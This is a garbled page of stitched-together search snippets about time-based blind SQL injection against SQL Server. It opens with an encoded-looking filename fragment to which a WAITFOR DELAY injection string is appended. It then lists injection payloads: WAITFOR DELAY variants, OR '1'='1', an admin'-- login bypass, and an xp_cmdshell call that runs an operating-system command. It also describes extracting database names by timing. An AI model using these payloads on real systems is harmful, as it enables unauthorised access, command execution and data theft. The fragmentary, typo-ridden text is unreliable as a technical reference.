BW90b3JvbGEgcjI2MDAgc2VydmljZSBtYW51YWwucmFybGtqaAbW9';WAITFOR DELAY '0:0:5'--
We inject the following string into the request parameter and monitor how long the application takes to identify any vulnerabilities. 1; waitfor delay '0:0:5'--.. ... 'O', 'O'); * OR '1'='1 'O:0:15;-- waitfor delay 'O:0:15;-- ';waitfor delay 1', 'O', 'O');waitfor 1 AND 1=1 1 * AND 'O:0:15?-- delay '0:0:15';-- "1"71 ;waitfor delay 1,.... Specifies the period of time, in milliseconds, to wait for a message to arrive ... BEGIN WAITFOR DELAY '02:00'; EXECUTE sp_helpdb; END; GO.... Is this a viable solution for the WAITFOR attack? ... The WAITFOR trick is most likely just being used for 'sniffing' for the vulnerability; once.... Username: admin'--; SELECT * FROM members WHERE username = 'admin'--' AND ... DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ... For this you can use WAITFOR DELAY '0:0:10' in SQL Server,.... If the first letter of the first database's name is an 'A', wait for 10 seconds. If the first ...' waitfor delay '00:00:10'--. MySQL.
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